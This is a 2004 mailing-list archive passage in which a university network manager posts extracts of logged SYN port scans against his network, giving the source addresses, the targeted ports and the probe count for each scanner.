xxx.yyy.1.9:1433 SYN ******S* [...] 
Jul 1 11:47:31 82.37.132.10:2474 -> xxx.yyy.79.245:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2473 -> xxx.yyy.79.244:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2477 -> xxx.yyy.79.246:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2480 -> xxx.yyy.79.249:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2479 -> xxx.yyy.79.248:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2478 -> xxx.yyy.79.247:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2807 -> xxx.yyy.80.37:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2482 -> xxx.yyy.79.250:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2483 -> xxx.yyy.79.251:1433 SYN ******S* 18521 Jul 1 23:56:38 202.223.103.18:2814 -> xxx.yyy.133.236:5554 SYN ******S* Jul 1 23:56:39 202.223.103.18:3524 -> xxx.yyy.133.236:1023 SYN ******S* Jul 1 23:56:38 202.223.103.18:2813 -> xxx.yyy.133.235:5554 SYN ******S* Jul 1 23:56:39 202.223.103.18:3521 -> xxx.yyy.133.235:1023 SYN ******S* Jul 1 23:56:41 202.223.103.18:1556 -> xxx.yyy.133.235:9898 SYN ******S* Jul 1 23:56:38 202.223.103.18:2815 -> xxx.yyy.133.237:5554 SYN ******S* Jul 1 23:56:39 202.223.103.18:3539 -> xxx.yyy.133.237:1023 SYN ******S* Jul 1 23:56:41 202.223.103.18:1566 -> xxx.yyy.133.237:9898 SYN ******S* [...] 
Jul 1 23:57:26 202.223.103.18:3762 -> xxx.yyy.154.96:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3764 -> xxx.yyy.154.92:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3766 -> xxx.yyy.154.97:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3773 -> xxx.yyy.154.88:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3774 -> xxx.yyy.154.93:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3794 -> xxx.yyy.154.99:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3802 -> xxx.yyy.154.98:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3892 -> xxx.yyy.154.100:9898 SYN ******S* 14798 Jul 1 00:56:34 61.149.212.206:4950 -> xxx.yyy.133.14:5554 SYN ******S* Jul 1 00:56:35 61.149.212.206:1146 -> xxx.yyy.133.14:1023 SYN ******S* Jul 1 00:56:34 61.149.212.206:4953 -> xxx.yyy.133.17:5554 SYN ******S* Jul 1 00:56:35 61.149.212.206:1149 -> xxx.yyy.133.17:1023 SYN ******S* Jul 1 00:56:34 61.149.212.206:4952 -> xxx.yyy.133.16:5554 SYN ******S* Jul 1 00:56:35 61.149.212.206:1148 -> xxx.yyy.133.16:1023 SYN ******S* Jul 1 00:56:34 61.149.212.206:4951 -> xxx.yyy.133.15:5554 SYN ******S* Jul 1 00:56:35 61.149.212.206:1147 -> xxx.yyy.133.15:1023 SYN ******S* [...] 
Jul 1 00:58:42 61.149.212.206:3365 -> xxx.yyy.153.128:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3372 -> xxx.yyy.153.130:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3374 -> xxx.yyy.153.133:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3373 -> xxx.yyy.153.132:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3382 -> xxx.yyy.153.134:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3381 -> xxx.yyy.153.131:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3383 -> xxx.yyy.153.135:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3384 -> xxx.yyy.153.136:9898 SYN ******S* 13034 Jul 1 00:56:43 61.51.90.138:3756 -> xxx.yyy.214.246:5554 SYN ******S* Jul 1 00:56:46 61.51.90.138:1310 -> xxx.yyy.214.246:9898 SYN ******S* Jul 1 00:56:43 61.51.90.138:3784 -> xxx.yyy.215.0:5554 SYN ******S* Jul 1 00:56:43 61.51.90.138:3804 -> xxx.yyy.215.1:5554 SYN ******S* Jul 1 00:56:44 61.51.90.138:4250 -> xxx.yyy.215.1:1023 SYN ******S* Jul 1 00:56:46 61.51.90.138:1360 -> xxx.yyy.215.1:9898 SYN ******S* Jul 1 00:56:43 61.51.90.138:3828 -> xxx.yyy.215.2:5554 SYN ******S* Jul 1 00:56:44 61.51.90.138:4263 -> xxx.yyy.215.2:1023 SYN ******S* [...] Jul 1 00:58:12 61.51.90.138:3764 -> xxx.yyy.235.2:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3771 -> xxx.yyy.234.244:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3772 -> xxx.yyy.235.1:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3787 -> xxx.yyy.235.5:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3781 -> xxx.yyy.235.3:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3784 -> xxx.yyy.235.8:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3793 -> xxx.yyy.235.7:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3795 -> xxx.yyy.235.4:9898 SYN ******S* 12798 [...] 
12288 Jul 1 00:56:20 221.218.36.146:1874 -> xxx.yyy.235.113:5554 SYN ******S* Jul 1 00:56:21 221.218.36.146:2603 -> xxx.yyy.235.113:1023 SYN ******S* Jul 1 00:56:23 221.218.36.146:3884 -> xxx.yyy.235.113:9898 SYN ******S* Jul 1 00:56:20 221.218.36.146:1884 -> xxx.yyy.235.114:5554 SYN ******S* Jul 1 00:56:21 221.218.36.146:2608 -> xxx.yyy.235.114:1023 SYN ******S* Jul 1 00:56:23 221.218.36.146:3892 -> xxx.yyy.235.114:9898 SYN ******S* Jul 1 00:56:21 221.218.36.146:1877 -> xxx.yyy.235.115:5554 SYN ******S* Jul 1 00:56:21 221.218.36.146:2609 -> xxx.yyy.235.115:1023 SYN ******S* [...] Jul 1 00:57:50 221.218.36.146:3818 -> xxx.yyy.255.146:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:3813 -> xxx.yyy.255.144:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:3819 -> xxx.yyy.255.145:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:3861 -> xxx.yyy.255.147:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:3865 -> xxx.yyy.255.148:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:4035 -> xxx.yyy.255.150:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:4037 -> xxx.yyy.255.149:9898 SYN ******S* Jul 1 00:57:53 221.218.36.146:1900 -> xxx.yyy.255.234:9898 SYN ******S* 12080 Jul 1 00:56:15 61.51.63.169:3494 -> xxx.yyy.154.100:5554 SYN ******S* Jul 1 00:56:16 61.51.63.169:3777 -> xxx.yyy.154.100:1023 SYN ******S* Jul 1 00:56:18 61.51.63.169:4325 -> xxx.yyy.154.100:9898 SYN ******S* Jul 1 00:56:15 61.51.63.169:3496 -> xxx.yyy.154.102:5554 SYN ******S* Jul 1 00:56:16 61.51.63.169:3778 -> xxx.yyy.154.102:1023 SYN ******S* Jul 1 00:56:18 61.51.63.169:4326 -> xxx.yyy.154.102:9898 SYN ******S* Jul 1 00:56:15 61.51.63.169:3498 -> xxx.yyy.154.104:5554 SYN ******S* Jul 1 00:56:16 61.51.63.169:3783 -> xxx.yyy.154.104:1023 SYN ******S* [...] 
Jul 1 00:57:32 61.51.63.169:2849 -> xxx.yyy.174.215:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2850 -> xxx.yyy.174.216:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2858 -> xxx.yyy.174.218:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2857 -> xxx.yyy.174.217:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2860 -> xxx.yyy.174.220:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2863 -> xxx.yyy.174.221:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2859 -> xxx.yyy.174.219:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2864 -> xxx.yyy.174.222:9898 SYN ******S* 11880 Jul 1 00:56:19 61.55.27.181:3604 -> xxx.yyy.235.112:5554 SYN ******S* Jul 1 00:56:20 61.55.27.181:4395 -> xxx.yyy.235.112:1023 SYN ******S* Jul 1 00:56:22 61.55.27.181:2176 -> xxx.yyy.235.112:9898 SYN ******S* Jul 1 00:56:19 61.55.27.181:3609 -> xxx.yyy.235.116:5554 SYN ******S* Jul 1 00:56:20 61.55.27.181:4397 -> xxx.yyy.235.116:1023 SYN ******S* Jul 1 00:56:22 61.55.27.181:2177 -> xxx.yyy.235.116:9898 SYN ******S* Jul 1 00:56:19 61.55.27.181:3605 -> xxx.yyy.235.113:5554 SYN ******S* Jul 1 00:56:22 61.55.27.181:2178 -> xxx.yyy.235.113:9898 SYN ******S* [...] 
Jul 1 00:57:05 61.55.27.181:1056 -> xxx.yyy.255.41:9898 SYN ******S* Jul 1 00:57:05 61.55.27.181:1057 -> xxx.yyy.255.42:9898 SYN ******S* Jul 1 00:57:05 61.55.27.181:1249 -> xxx.yyy.255.89:9898 SYN ******S* Jul 1 00:57:05 61.55.27.181:1253 -> xxx.yyy.255.92:9898 SYN ******S* Jul 1 00:57:06 61.55.27.181:1672 -> xxx.yyy.255.141:9898 SYN ******S* Jul 1 00:57:07 61.55.27.181:2010 -> xxx.yyy.255.200:9898 SYN ******S* Jul 1 00:57:07 61.55.27.181:2014 -> xxx.yyy.255.204:9898 SYN ******S* Jul 1 00:57:07 61.55.27.181:2034 -> xxx.yyy.255.225:9898 SYN ******S* 11652 Jul 1 00:56:46 218.191.196.81:3252 -> xxx.yyy.215.210:5554 SYN ******S* Jul 1 00:56:47 218.191.196.81:3670 -> xxx.yyy.215.210:1023 SYN ******S* Jul 1 00:56:49 218.191.196.81:4720 -> xxx.yyy.215.210:9898 SYN ******S* Jul 1 00:56:46 218.191.196.81:3253 -> xxx.yyy.215.211:5554 SYN ******S* Jul 1 00:56:47 218.191.196.81:3671 -> xxx.yyy.215.211:1023 SYN ******S* Jul 1 00:56:49 218.191.196.81:4721 -> xxx.yyy.215.211:9898 SYN ******S* Jul 1 00:56:46 218.191.196.81:3258 -> xxx.yyy.215.216:5554 SYN ******S* Jul 1 00:56:47 218.191.196.81:3676 -> xxx.yyy.215.216:1023 SYN ******S* [...] 
Jul 1 00:57:32 218.191.196.81:4562 -> xxx.yyy.236.59:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4569 -> xxx.yyy.236.66:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4570 -> xxx.yyy.236.67:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4571 -> xxx.yyy.236.68:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4574 -> xxx.yyy.236.69:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4575 -> xxx.yyy.236.70:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4576 -> xxx.yyy.236.71:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4577 -> xxx.yyy.236.72:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4578 -> xxx.yyy.236.73:9898 SYN ******S* 11110 Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.1:3127 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jul 1 08:54:45 219.35.68.133:22002 -> xxx.yyy.1.1:3128 SYN ******S* [...] 
Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.254:3127 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.254:1080 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.254:10080 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.254:3128 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.255:3127 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.255:1080 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.255:10080 SYN ******S* Jul 1 09:29:09 219.35.68.133:22002 -> xxx.yyy.20.255:3128 SYN ******S* 10991 Jul 1 00:56:16 218.25.79.82:4151 -> xxx.yyy.235.118:5554 SYN ******S* Jul 1 00:56:17 218.25.79.82:1069 -> xxx.yyy.235.118:1023 SYN ******S* Jul 1 00:56:19 218.25.79.82:2076 -> xxx.yyy.235.118:9898 SYN ******S* Jul 1 00:56:16 218.25.79.82:4144 -> xxx.yyy.235.112:5554 SYN ******S* Jul 1 00:56:17 218.25.79.82:1062 -> xxx.yyy.235.112:1023 SYN ******S* Jul 1 00:56:19 218.25.79.82:2070 -> xxx.yyy.235.112:9898 SYN ******S* Jul 1 00:56:16 218.25.79.82:4146 -> xxx.yyy.235.113:5554 SYN ******S* Jul 1 00:56:17 218.25.79.82:1065 -> xxx.yyy.235.113:1023 SYN ******S* [...] 
Jul 1 00:57:00 218.25.79.82:2035 -> xxx.yyy.255.227:9898 SYN ******S*
Jul 1 00:57:00 218.25.79.82:2036 -> xxx.yyy.255.228:9898 SYN ******S*
Jul 1 00:57:00 218.25.79.82:2038 -> xxx.yyy.255.230:9898 SYN ******S*
Jul 1 00:57:00 218.25.79.82:2037 -> xxx.yyy.255.229:9898 SYN ******S*
Jul 1 00:57:00 218.25.79.82:2039 -> xxx.yyy.255.231:9898 SYN ******S*
Jul 1 00:57:00 218.25.79.82:2040 -> xxx.yyy.255.232:9898 SYN ******S*
Jul 1 00:57:00 218.25.79.82:2042 -> xxx.yyy.255.234:9898 SYN ******S*
Jul 1 00:57:00 218.25.79.82:2041 -> xxx.yyy.255.233:9898 SYN ******S*
9240

--
- Ken
===========================================================================
Ken Connelly (KC152)
Systems and Operations Manager, ITS - Network Services
University of Northern Iowa
Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu
phone: (319) 273-5850
fax: (319) 273-7373

From Ken.Connelly at uni.edu Sat Jul 3 18:55:54 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Sat, 03 Jul 2004 13:55:54 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LC0ZGL94B88YCV4W@uni.edu>

The following extracts show the beginning and ending of scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.

Jul 2 06:26:44 218.62.5.158:58031 -> xxx.yyy.1.0:443 SYN ******S*
Jul 2 06:26:44 218.62.5.158:58032 -> xxx.yyy.1.1:443 SYN ******S*
Jul 2 06:26:44 218.62.5.158:58033 -> xxx.yyy.1.2:443 SYN ******S*
Jul 2 06:26:44 218.62.5.158:58034 -> xxx.yyy.1.3:443 SYN ******S*
Jul 2 06:26:47 218.62.5.158:58035 -> xxx.yyy.1.4:443 SYN ******S*
Jul 2 06:26:47 218.62.5.158:58036 -> xxx.yyy.1.5:443 SYN ******S*
Jul 2 06:26:47 218.62.5.158:58037 -> xxx.yyy.1.6:443 SYN ******S*
Jul 2 06:26:47 218.62.5.158:58038 -> xxx.yyy.1.7:443 SYN ******S*
[...]
Jul 2 06:38:37 218.62.5.158:39000 -> xxx.yyy.255.251:443 SYN ******S*
Jul 2 06:38:37 218.62.5.158:38998 -> xxx.yyy.255.249:443 SYN ******S*
Jul 2 06:38:37 218.62.5.158:38982 -> xxx.yyy.255.233:443 SYN ******S*
Jul 2 06:38:37 218.62.5.158:38975 -> xxx.yyy.255.226:443 SYN ******S*
Jul 2 06:38:37 218.62.5.158:38987 -> xxx.yyy.255.238:443 SYN ******S*
Jul 2 06:38:37 218.62.5.158:38995 -> xxx.yyy.255.246:443 SYN ******S*
Jul 2 06:38:37 218.62.5.158:38997 -> xxx.yyy.255.248:443 SYN ******S*
Jul 2 06:38:37 218.62.5.158:39003 -> xxx.yyy.255.254:443 SYN ******S*
99014

Jul 2 06:07:02 212.240.38.132:2394 -> xxx.yyy.1.1:20168 SYN ******S*
Jul 2 06:07:02 212.240.38.132:2395 -> xxx.yyy.1.2:20168 SYN ******S*
Jul 2 06:07:02 212.240.38.132:2396 -> xxx.yyy.1.3:20168 SYN ******S*
Jul 2 06:07:03 212.240.38.132:2397 -> xxx.yyy.1.4:20168 SYN ******S*
Jul 2 06:07:03 212.240.38.132:2398 -> xxx.yyy.1.5:20168 SYN ******S*
Jul 2 06:07:03 212.240.38.132:2399 -> xxx.yyy.1.6:20168 SYN ******S*
Jul 2 06:07:03 212.240.38.132:2400 -> xxx.yyy.1.7:20168 SYN ******S*
Jul 2 06:07:03 212.240.38.132:2401 -> xxx.yyy.1.8:20168 SYN ******S*
[...]
Jul 2 06:31:13 212.240.38.132:2634 -> xxx.yyy.zzz.247:20168 SYN ******S*
Jul 2 06:31:13 212.240.38.132:2641 -> xxx.yyy.zzz.254:20168 SYN ******S*
Jul 2 06:31:13 212.240.38.132:2638 -> xxx.yyy.zzz.251:20168 SYN ******S*
Jul 2 06:31:13 212.240.38.132:2635 -> xxx.yyy.zzz.248:20168 SYN ******S*
Jul 2 06:31:13 212.240.38.132:2639 -> xxx.yyy.zzz.252:20168 SYN ******S*
Jul 2 06:31:13 212.240.38.132:2636 -> xxx.yyy.zzz.249:20168 SYN ******S*
Jul 2 06:31:13 212.240.38.132:2633 -> xxx.yyy.zzz.246:20168 SYN ******S*
Jul 2 06:31:13 212.240.38.132:2640 -> xxx.yyy.zzz.253:20168 SYN ******S*
Jul 2 06:31:13 212.240.38.132:2637 -> xxx.yyy.zzz.250:20168 SYN ******S*
74084

Jul 2 05:54:17 212.79.129.49:2727 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 2 05:54:17 212.79.129.49:2728 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 2 05:54:17 212.79.129.49:2729 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 2 05:54:14 212.79.129.49:2731 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 2 05:54:14 212.79.129.49:2730 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 2 05:54:17 212.79.129.49:2732 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 2 05:54:17 212.79.129.49:2733 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 2 05:54:17 212.79.129.49:2734 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 2 06:05:56 212.79.129.49:4171 -> xxx.yyy.255.218:1433 SYN ******S*
Jul 2 06:05:56 212.79.129.49:4168 -> xxx.yyy.255.216:1433 SYN ******S*
Jul 2 06:05:56 212.79.129.49:4170 -> xxx.yyy.255.217:1433 SYN ******S*
Jul 2 06:05:56 212.79.129.49:4166 -> xxx.yyy.255.215:1433 SYN ******S*
Jul 2 06:05:57 212.79.129.49:4176 -> xxx.yyy.255.222:1433 SYN ******S*
Jul 2 06:05:57 212.79.129.49:4178 -> xxx.yyy.255.224:1433 SYN ******S*
Jul 2 06:05:57 212.79.129.49:4180 -> xxx.yyy.255.226:1433 SYN ******S*
Jul 2 06:05:57 212.79.129.49:4177 -> xxx.yyy.255.223:1433 SYN ******S*
Jul 2 06:05:57 212.79.129.49:4179 -> xxx.yyy.255.225:1433 SYN ******S*
71735

Jul 2 18:44:13 213.242.147.168:1112 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 2 18:44:13 213.242.147.168:1113 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 2 18:44:15 213.242.147.168:1114 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 2 18:44:15 213.242.147.168:1115 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 2 18:44:13 213.242.147.168:1116 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 2 18:44:16 213.242.147.168:1117 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 2 18:44:16 213.242.147.168:1118 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 2 18:44:16 213.242.147.168:1119 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 2 18:55:54 213.242.147.168:3531 -> xxx.yyy.255.239:1433 SYN ******S*
Jul 2 18:55:54 213.242.147.168:3532 -> xxx.yyy.255.240:1433 SYN ******S*
Jul 2 18:55:54 213.242.147.168:3533 -> xxx.yyy.255.241:1433 SYN ******S*
Jul 2 18:55:54 213.242.147.168:3534 -> xxx.yyy.255.242:1433 SYN ******S*
Jul 2 18:55:54 213.242.147.168:3535 -> xxx.yyy.255.243:1433 SYN ******S*
Jul 2 18:55:54 213.242.147.168:3539 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 2 18:55:54 213.242.147.168:3543 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 2 18:55:54 213.242.147.168:3544 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 2 18:55:54 213.242.147.168:3545 -> xxx.yyy.255.253:1433 SYN ******S*
71277

Jul 2 14:24:47 82.41.88.225:1534 -> xxx.yyy.1.11:1433 SYN ******S*
Jul 2 14:24:47 82.41.88.225:1529 -> xxx.yyy.1.10:1433 SYN ******S*
Jul 2 14:24:47 82.41.88.225:1539 -> xxx.yyy.1.12:1433 SYN ******S*
Jul 2 14:24:47 82.41.88.225:1568 -> xxx.yyy.1.13:1433 SYN ******S*
Jul 2 14:24:50 82.41.88.225:1591 -> xxx.yyy.1.16:1433 SYN ******S*
Jul 2 14:24:50 82.41.88.225:1595 -> xxx.yyy.1.17:1433 SYN ******S*
Jul 2 14:24:50 82.41.88.225:1612 -> xxx.yyy.1.18:1433 SYN ******S*
Jul 2 14:24:50 82.41.88.225:1616 -> xxx.yyy.1.20:1433 SYN ******S*
[...]
Jul 2 18:13:30 82.41.88.225:4112 -> xxx.yyy.255.234:1433 SYN ******S*
Jul 2 18:13:30 82.41.88.225:4121 -> xxx.yyy.255.235:1433 SYN ******S*
Jul 2 18:13:30 82.41.88.225:4104 -> xxx.yyy.255.233:1433 SYN ******S*
Jul 2 18:13:30 82.41.88.225:4101 -> xxx.yyy.255.232:1433 SYN ******S*
Jul 2 18:13:30 82.41.88.225:4172 -> xxx.yyy.255.236:1433 SYN ******S*
Jul 2 18:13:30 82.41.88.225:4356 -> xxx.yyy.255.238:1433 SYN ******S*
Jul 2 18:13:30 82.41.88.225:4474 -> xxx.yyy.255.243:1433 SYN ******S*
Jul 2 18:13:30 82.41.88.225:4472 -> xxx.yyy.255.242:1433 SYN ******S*
66415

Jul 2 06:34:47 212.217.40.8:3915 -> xxx.yyy.1.1:139 SYN ******S*
Jul 2 06:34:50 212.217.40.8:3919 -> xxx.yyy.1.2:139 SYN ******S*
Jul 2 06:34:50 212.217.40.8:3921 -> xxx.yyy.1.3:139 SYN ******S*
Jul 2 06:34:50 212.217.40.8:3923 -> xxx.yyy.1.4:139 SYN ******S*
Jul 2 06:34:50 212.217.40.8:3925 -> xxx.yyy.1.5:139 SYN ******S*
Jul 2 06:34:47 212.217.40.8:3927 -> xxx.yyy.1.6:139 SYN ******S*
Jul 2 06:34:50 212.217.40.8:3929 -> xxx.yyy.1.7:139 SYN ******S*
Jul 2 06:34:50 212.217.40.8:3932 -> xxx.yyy.1.8:139 SYN ******S*
[...]
Jul 2 06:47:33 212.217.40.8:2926 -> xxx.yyy.255.248:139 SYN ******S*
Jul 2 06:47:33 212.217.40.8:2916 -> xxx.yyy.255.243:139 SYN ******S*
Jul 2 06:47:33 212.217.40.8:2922 -> xxx.yyy.255.246:139 SYN ******S*
Jul 2 06:47:33 212.217.40.8:2928 -> xxx.yyy.255.249:139 SYN ******S*
Jul 2 06:47:33 212.217.40.8:2918 -> xxx.yyy.255.244:139 SYN ******S*
Jul 2 06:47:33 212.217.40.8:2924 -> xxx.yyy.255.247:139 SYN ******S*
Jul 2 06:47:33 212.217.40.8:2933 -> xxx.yyy.255.251:139 SYN ******S*
Jul 2 06:47:33 212.217.40.8:2940 -> xxx.yyy.255.254:139 SYN ******S*
Jul 2 06:47:33 212.217.40.8:2935 -> xxx.yyy.255.252:139 SYN ******S*
65526

Jul 2 08:09:59 66.236.14.101:3132 -> xxx.yyy.1.1:554 SYN ******S*
Jul 2 08:09:59 66.236.14.101:3133 -> xxx.yyy.1.2:554 SYN ******S*
Jul 2 08:09:59 66.236.14.101:3134 -> xxx.yyy.1.3:554 SYN ******S*
Jul 2 08:10:01 66.236.14.101:3135 -> xxx.yyy.1.4:554 SYN ******S*
Jul 2 08:10:01 66.236.14.101:3136 -> xxx.yyy.1.5:554 SYN ******S*
Jul 2 08:10:01 66.236.14.101:3137 -> xxx.yyy.1.6:554 SYN ******S*
Jul 2 08:10:01 66.236.14.101:3138 -> xxx.yyy.1.7:554 SYN ******S*
Jul 2 08:10:01 66.236.14.101:3139 -> xxx.yyy.1.8:554 SYN ******S*
[...]
Jul 2 08:18:35 66.236.14.101:1487 -> xxx.yyy.255.224:554 SYN ******S*
Jul 2 08:18:35 66.236.14.101:1488 -> xxx.yyy.255.225:554 SYN ******S*
Jul 2 08:18:35 66.236.14.101:1489 -> xxx.yyy.255.226:554 SYN ******S*
Jul 2 08:18:35 66.236.14.101:1490 -> xxx.yyy.255.227:554 SYN ******S*
Jul 2 08:18:35 66.236.14.101:1491 -> xxx.yyy.255.228:554 SYN ******S*
Jul 2 08:18:35 66.236.14.101:1492 -> xxx.yyy.255.229:554 SYN ******S*
Jul 2 08:18:35 66.236.14.101:1493 -> xxx.yyy.255.230:554 SYN ******S*
Jul 2 08:18:35 66.236.14.101:1494 -> xxx.yyy.255.231:554 SYN ******S*
49318

Jul 2 19:09:55 218.27.56.14:42703 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 2 19:09:55 218.27.56.14:42704 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 2 19:09:58 218.27.56.14:42710 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 2 19:09:57 218.27.56.14:42714 -> xxx.yyy.1.14:4899 SYN ******S*
Jul 2 19:09:58 218.27.56.14:42715 -> xxx.yyy.1.15:4899 SYN ******S*
Jul 2 19:09:57 218.27.56.14:42716 -> xxx.yyy.1.16:4899 SYN ******S*
Jul 2 19:09:57 218.27.56.14:42717 -> xxx.yyy.1.17:4899 SYN ******S*
Jul 2 19:09:58 218.27.56.14:42722 -> xxx.yyy.1.13:4899 SYN ******S*
[...]
Jul 2 19:23:40 218.27.56.14:56512 -> xxx.yyy.241.146:4899 SYN ******S*
Jul 2 19:23:40 218.27.56.14:58285 -> xxx.yyy.241.147:4899 SYN ******S*
Jul 2 19:23:40 218.27.56.14:58286 -> xxx.yyy.241.149:4899 SYN ******S*
Jul 2 19:23:40 218.27.56.14:54677 -> xxx.yyy.241.148:4899 SYN ******S*
Jul 2 19:23:40 218.27.56.14:58287 -> xxx.yyy.241.152:4899 SYN ******S*
Jul 2 19:23:40 218.27.56.14:56513 -> xxx.yyy.241.153:4899 SYN ******S*
Jul 2 19:23:40 218.27.56.14:56515 -> xxx.yyy.241.151:4899 SYN ******S*
Jul 2 19:23:40 218.27.56.14:58288 -> xxx.yyy.241.154:4899 SYN ******S*
Jul 2 19:23:40 218.27.56.14:56514 -> xxx.yyy.241.150:4899 SYN ******S*
44405

Jul 2 08:55:28 218.238.121.105:4684 -> xxx.yyy.1.0:4899 SYN ******S*
Jul 2 08:55:28 218.238.121.105:4686 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 2 08:55:28 218.238.121.105:4687 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 2 08:55:27 218.238.121.105:4689 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 2 08:55:27 218.238.121.105:4691 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 2 08:55:27 218.238.121.105:4688 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 2 08:55:27 218.238.121.105:4693 -> xxx.yyy.1.9:4899 SYN ******S*
Jul 2 08:55:27 218.238.121.105:4694 -> xxx.yyy.1.10:4899 SYN ******S*
[...]
Jul 2 09:35:01 218.238.121.105:2998 -> xxx.yyy.254.251:4899 SYN ******S*
Jul 2 09:35:01 218.238.121.105:2992 -> xxx.yyy.254.245:4899 SYN ******S*
Jul 2 09:35:01 218.238.121.105:2999 -> xxx.yyy.254.252:4899 SYN ******S*
Jul 2 09:35:01 218.238.121.105:2987 -> xxx.yyy.254.240:4899 SYN ******S*
Jul 2 09:35:01 218.238.121.105:2989 -> xxx.yyy.254.242:4899 SYN ******S*
Jul 2 09:35:01 218.238.121.105:2990 -> xxx.yyy.254.243:4899 SYN ******S*
Jul 2 09:35:01 218.238.121.105:2991 -> xxx.yyy.254.244:4899 SYN ******S*
Jul 2 09:35:01 218.238.121.105:2993 -> xxx.yyy.254.246:4899 SYN ******S*
Jul 2 09:35:01 218.238.121.105:3000 -> xxx.yyy.254.253:4899 SYN ******S*
44336

Jul 2 21:47:30 195.174.64.199:3330 -> xxx.yyy.1.1:139 SYN ******S*
